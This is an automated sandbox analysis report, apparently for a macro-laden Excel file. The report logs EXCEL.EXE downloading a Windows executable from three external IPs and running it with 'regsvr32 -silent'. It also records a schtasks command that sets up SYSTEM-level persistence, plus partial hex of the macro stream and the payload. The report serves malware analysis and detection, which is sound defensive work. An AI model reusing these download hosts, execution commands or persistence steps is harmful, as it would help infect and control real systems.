          File Type:SVR2 executable (USS/370) not stripped - version 12587540
          Stream Size:865
          Entropy:6.55213343791
          Base64 Encoded:True
          Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
          Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Sep 24, 2021 16:28:10.834551096 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:11.029290915 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:11.029418945 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:11.030591965 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:11.218058109 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048015118 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048058987 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048084974 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048121929 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048145056 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048168898 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048186064 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048196077 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.048213005 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.048213959 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048223019 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.048235893 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.048239946 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048249960 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.048264027 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.048274040 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.048299074 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.065785885 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.237802982 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237833023 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237852097 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237868071 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237884045 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237900019 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237915039 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237931967 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237947941 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237967014 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237983942 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.237999916 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.238014936 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.238030910 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.238045931 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.238059044 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.238117933 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.238147020 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.239797115 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.254482985 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.254513025 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.254529953 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.254544020 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.254637003 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426192045 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426232100 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426253080 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426269054 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426292896 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426312923 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426332951 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426352978 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426373005 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426381111 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426398993 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426405907 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426409960 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426419020 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426439047 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426440954 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426455021 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426470995 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426474094 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426495075 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426506042 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426516056 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426528931 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426534891 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426542997 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426554918 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426572084 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426577091 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426584959 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426599979 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426609993 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426621914 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426636934 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426640034 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.426651001 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.426672935 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.428459883 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461618900 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461675882 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461709023 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461745024 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461776972 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461806059 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461811066 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461833000 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461833000 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461838961 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461843967 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461862087 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461864948 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461893082 CEST8049165190.14.37.173192.168.2.22
          Sep 24, 2021 16:28:12.461904049 CEST4916580192.168.2.22190.14.37.173
          Sep 24, 2021 16:28:12.461921930 CEST8049165190.14.37.173192.168.2.22

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Sep 24, 2021 16:32:48.826920033 CEST5216753192.168.2.228.8.8.8
          Sep 24, 2021 16:32:48.846508980 CEST53521678.8.8.8192.168.2.22
          Sep 24, 2021 16:32:48.855469942 CEST5059153192.168.2.228.8.8.8
          Sep 24, 2021 16:32:48.874485016 CEST53505918.8.8.8192.168.2.22

          HTTP Request Dependency Graph

          • 190.14.37.173
          • 111.90.148.104
          • 51.89.115.111

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.2249165190.14.37.17380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          TimestampkBytes transferredDirectionData
          Sep 24, 2021 16:28:11.030591965 CEST0OUTGET /44463.6863100694.dat HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 190.14.37.173
          Connection: Keep-Alive
          Sep 24, 2021 16:28:12.048015118 CEST1INHTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 24 Sep 2021 14:28:11 GMT
          Content-Type: application/octet-stream
          Content-Length: 495616
          Connection: keep-alive
          X-Powered-By: PHP/5.4.16
          Accept-Ranges: bytes
          Expires: 0
          Cache-Control: no-cache, no-store, must-revalidate
          Content-Disposition: attachment; filename="44463.6863100694.dat"
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.2249166111.90.148.10480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          TimestampkBytes transferredDirectionData
          Sep 24, 2021 16:28:15.008909941 CEST521OUTGET /44463.6863100694.dat HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 111.90.148.104
          Connection: Keep-Alive
          Sep 24, 2021 16:28:20.882747889 CEST523INHTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 24 Sep 2021 14:28:21 GMT
          Content-Type: application/octet-stream
          Content-Length: 495616
          Connection: keep-alive
          X-Powered-By: PHP/5.4.16
          Accept-Ranges: bytes
          Expires: 0
          Cache-Control: no-cache, no-store, must-revalidate
          Content-Disposition: attachment; filename="44463.6863100694.dat"
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


          Session IDSource IPSource PortDestination IPDestination PortProcess
          2192.168.2.224916851.89.115.11180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          TimestampkBytes transferredDirectionData
          Sep 24, 2021 16:33:44.110038042 CEST633OUTGET /44463.6863100694.dat HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: 51.89.115.111
          Connection: Keep-Alive
          Sep 24, 2021 16:33:44.371587038 CEST634INHTTP/1.1 200 OK
          Server: nginx
          Date: Fri, 24 Sep 2021 14:33:44 GMT
          Content-Type: application/octet-stream
          Content-Length: 495616
          Connection: keep-alive
          X-Powered-By: PHP/5.4.16
          Accept-Ranges: bytes
          Expires: 0
          Cache-Control: no-cache, no-store, must-revalidate
          Content-Disposition: attachment; filename="44463.6863100694.dat"
          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 fd 0e a4 10 9c 60 f7 10 9c 60 f7 10 9c 60 f7 d3 93 00 f7 13 9c 60 f7 87 58 1e f7 11 9c 60 f7 37 5a 1d f7 32 9c 60 f7 37 5a 0e f7 96 9c 60 f7 d3 93 3e f7 17 9c 60 f7 10 9c 61 f7 bb 9c 60 f7 37 5a 0f f7 47 9c 60 f7 37 5a 1a f7 11 9c 60 f7 37 5a 1c f7 11 9c 60 f7 37 5a 19 f7 11 9c 60 f7 52 69 63 68 10 9c 60 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 27 1e 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 7b af 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T````X`7Z2`7Z`>`a`7ZG`7Z`7Z`7Z`Rich`PEL'E!1{?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B


          Code Manipulations

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: EXCEL.EXE PID: 2664 Parent PID: 596

          General

          Start time:16:28:13
          Start date:24/09/2021
          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          Wow64 process (32bit):false
          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Imagebase:0x13f190000
          File size:28253536 bytes
          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: regsvr32.exe PID: 2060 Parent PID: 2664

          General

          Start time:16:33:51
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32 -silent ..\Fiosa.der
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: regsvr32.exe PID: 2136 Parent PID: 2060

          General

          Start time:16:33:52
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\regsvr32.exe
          Wow64 process (32bit):true
          Commandline: -silent ..\Fiosa.der
          Imagebase:0xf70000
          File size:14848 bytes
          MD5 hash:432BE6CF7311062633459EEF6B242FB5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          Analysis Process: explorer.exe PID: 984 Parent PID: 2136

          General

          Start time:16:34:17
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\explorer.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\explorer.exe
          Imagebase:0x870000
          File size:2972672 bytes
          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: regsvr32.exe PID: 2796 Parent PID: 2664

          General

          Start time:16:34:19
          Start date:24/09/2021
          Path:C:\Windows\System32\regsvr32.exe
          Wow64 process (32bit):false
          Commandline:regsvr32 -silent ..\Fiosa1.der
          Imagebase:0xff320000
          File size:19456 bytes
          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Analysis Process: schtasks.exe PID: 1476 Parent PID: 984

          General

          Start time:16:34:19
          Start date:24/09/2021
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
          Imagebase:0x450000
          File size:179712 bytes
          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
          Has elevated privileges:true
          Has administrator privileges:true
